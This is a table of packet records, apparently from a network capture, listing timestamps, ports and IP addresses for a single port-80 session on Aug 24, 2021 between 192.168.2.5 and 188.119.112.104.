Aug 24, 2021 08:50:16.104002953 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104028940 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104043961 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104053020 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104064941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104083061 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104095936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104109049 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104126930 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104139090 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104156017 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104167938 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104181051 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104180098 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104193926 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104213953 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104228020 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104243994 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104257107 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104274035 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104288101 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104298115 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104306936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104321003 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104338884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104348898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104351044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104367971 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104376078 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104387045 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104404926 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104422092 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104434013 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104434967 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104449987 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104466915 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104475975 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104480028 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.104496002 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.104526997 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.110313892 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.110333920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.110361099 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.110409021 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.111547947 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111563921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111588001 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111602068 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111646891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111654043 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.111660957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111685991 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111696959 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.111726046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.111732006 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.112217903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.112234116 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.112315893 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.121197939 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.121212959 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.121234894 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.121280909 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.121309996 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.129911900 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.129934072 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.129956961 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.129980087 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.129992962 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130028009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130040884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130058050 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130070925 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130084991 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130090952 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130096912 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130110025 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130130053 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130146980 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130157948 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130165100 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130177975 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130187988 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130196095 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130208969 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130213976 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130223036 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130238056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130245924 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130254984 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130268097 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130279064 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130284071 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130296946 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130311012 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130316019 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130323887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130337000 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130340099 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130348921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.130379915 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.130415916 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.132024050 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.132044077 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.132071018 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.132085085 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.132168055 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.132215977 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.137476921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.137499094 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.137624025 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.138859987 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.138880014 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.138907909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.138921976 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.138935089 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.138993025 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.139137983 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.145561934 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.145670891 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.145687103 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.145791054 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.145865917 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.145921946 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.145945072 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.145958900 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.146024942 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148262978 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148298025 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148313046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148324966 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148341894 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148355007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148370981 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148385048 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148401976 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148401022 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148416996 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148433924 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148453951 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148459911 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148471117 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148488998 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148502111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148504972 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148515940 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148518085 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148530006 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148542881 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148547888 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148561001 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148574114 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148591042 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148602962 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148607016 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148617029 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148634911 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148643017 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148648977 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148662090 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148674011 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148685932 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148701906 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148714066 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148730040 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148749113 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148765087 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148773909 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148783922 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148786068 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148797989 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148809910 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148823977 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148833990 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148835897 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148849964 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148859024 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148864031 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148879051 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148895979 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148906946 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148912907 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148920059 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148927927 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148933887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148947954 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148957968 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148962975 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148977995 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.148984909 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.148991108 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.149005890 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.149020910 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.149029016 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.149034023 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.149049044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.149076939 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.149089098 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.150584936 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.150742054 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.150767088 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.150793076 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.150825024 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155417919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155508041 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155596018 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155718088 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155738115 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155761957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155780077 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155791044 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155805111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155826092 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155829906 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155844927 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155857086 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155863047 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155883074 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155888081 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155901909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155921936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155925989 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155940056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155960083 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155963898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155976057 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.155988932 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.155994892 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156013966 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156040907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156054974 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.156060934 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156080008 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156091928 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.156105042 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156125069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156127930 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.156145096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156164885 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.156167030 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.156229019 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.160635948 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160661936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160696983 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160716057 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160738945 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160744905 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.160758972 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.160789013 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.160844088 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.162009954 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.162034988 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.162060022 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.162127018 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.163345098 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.163367987 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.163392067 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.163455963 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.170133114 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.170162916 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.170182943 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.170253992 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.173739910 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173768044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173795938 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173816919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173841953 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173861980 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173881054 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.173882961 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173902035 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173926115 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173938990 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.173943043 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173962116 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.173976898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.173984051 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.174002886 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.174005985 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.174021006 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.174031019 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.174040079 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.175539970 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.181732893 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181761026 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181788921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181821108 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181848049 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181866884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181866884 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.181885958 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181919098 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181926966 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.181947947 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181952953 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.181969881 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.181978941 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.181991100 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182009935 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182018042 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182033062 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182063103 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182075977 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182094097 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182109118 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182113886 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182140112 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182163954 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182183027 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182185888 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182200909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182220936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182224035 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182240009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182248116 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182269096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182286024 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182287931 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182307005 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182326078 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182337999 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182353973 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182384014 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182385921 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182404995 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182430029 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182449102 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182450056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182470083 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182490110 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182511091 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182514906 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182538986 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182542086 CEST	80	49766	188.119.112.104	192.168.2.5
